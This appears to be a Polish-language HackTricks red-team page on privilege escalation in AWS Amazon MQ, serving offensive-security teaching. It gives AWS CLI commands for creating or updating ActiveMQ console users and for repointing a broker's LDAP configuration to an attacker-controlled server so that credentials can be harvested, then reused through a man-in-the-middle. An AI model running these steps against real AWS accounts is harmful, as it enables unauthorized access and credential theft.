AWS - MQ Privesc

Tip

Ucz się & ćwicz AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się & ćwicz GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Ucz się & ćwicz Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Wspieraj HackTricks

MQ

Aby uzyskać więcej informacji o MQ, zobacz:

AWS - MQ Enum

mq:ListBrokers, mq:CreateUser

Dzięki tym uprawnieniom możesz utworzyć nowego użytkownika w brokerze ActimeMQ (to nie działa w RabbitMQ):

aws mq list-brokers
aws mq create-user --broker-id <value> --console-access --password <value> --username <value>

Potencjalny wpływ: Dostęp do wrażliwych informacji podczas nawigacji po ActiveMQ

mq:ListBrokers, mq:ListUsers, mq:UpdateUser

Dzięki tym uprawnieniom możesz utworzyć nowego użytkownika w brokerze ActimeMQ (to nie działa w RabbitMQ):

aws mq list-brokers
aws mq list-users --broker-id <value>
aws mq update-user --broker-id <value> --console-access --password <value> --username <value>

Potential Impact: Uzyskanie dostępu do poufnych informacji podczas nawigacji po ActiveMQ

mq:ListBrokers, mq:UpdateBroker

Jeśli broker używa LDAP do autoryzacji z ActiveMQ, możliwe jest zmienienie konfiguracji serwera LDAP na wskazanie serwera kontrolowanego przez atakującego. W ten sposób atakujący będzie w stanie wykraść wszystkie poświadczenia przesyłane przez LDAP.

aws mq list-brokers
aws mq update-broker --broker-id <value> --ldap-server-metadata=...

Jeśli w jakiś sposób znajdziesz oryginalne credentials używane przez ActiveMQ, możesz przeprowadzić MitM, ukraść creds, użyć ich na oryginalnym serwerze i przesłać odpowiedź (być może wystarczy po prostu ponownie użyć skradzionych credentials).

Potencjalny wpływ: Ukradzenie credentials ActiveMQ

Tip

Ucz się & ćwicz AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się & ćwicz GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Ucz się & ćwicz Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Wspieraj HackTricks